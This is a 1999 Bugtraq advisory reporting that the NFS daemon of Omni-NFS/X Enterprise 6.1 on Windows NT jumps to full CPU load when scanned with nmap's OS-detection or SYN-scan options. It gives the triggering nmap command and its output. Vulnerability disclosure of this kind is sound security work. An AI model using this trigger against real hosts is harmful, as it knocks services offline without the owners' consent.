[12144] in bugtraq
Omni-NFS/X Enterprise (nfsd.exe) DOS
daemon@ATHENA.MIT.EDU (S.Faust)
Wed Oct 6 14:55:16 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <001701bf0fca$f44e8420$090f010a@datasurge.net>
Date: Wed, 6 Oct 1999 03:18:13 -0400
Reply-To: "S.Faust" <sfaust@ISI-MTL.COM>
From: "S.Faust" <sfaust@ISI-MTL.COM>
X-To: bugtraq <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Faulty software
---------------
Omni-NFS/X Enterprise version 6.1
Product
---------
Omni-NFS/X Enterprise is a X, NFS server solution for win32 systems.
It is written by XLink Technology ( http://www.xlink.com ) .
Vulnerability
-------------
The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage
if you scan it
using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) )
.
Example :
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007)
$ nmap -O -p 111 slacky
Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on slacky (192.168.1.2):
Port State Protocol Service
111 open tcp sunrpc
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=2 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98
Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008)
$
This was tested on Microsoft Windows NT 4.0 Workstation with SP5 .
I'm preaty sure all their NFS solutions are affected by this.
------------------------------------------------
Sacha Faust sfaust@isi-mtl.com
"He who despairs of the human condition is a coward, but he who has hope for
it is a fool. " - Albert Camus
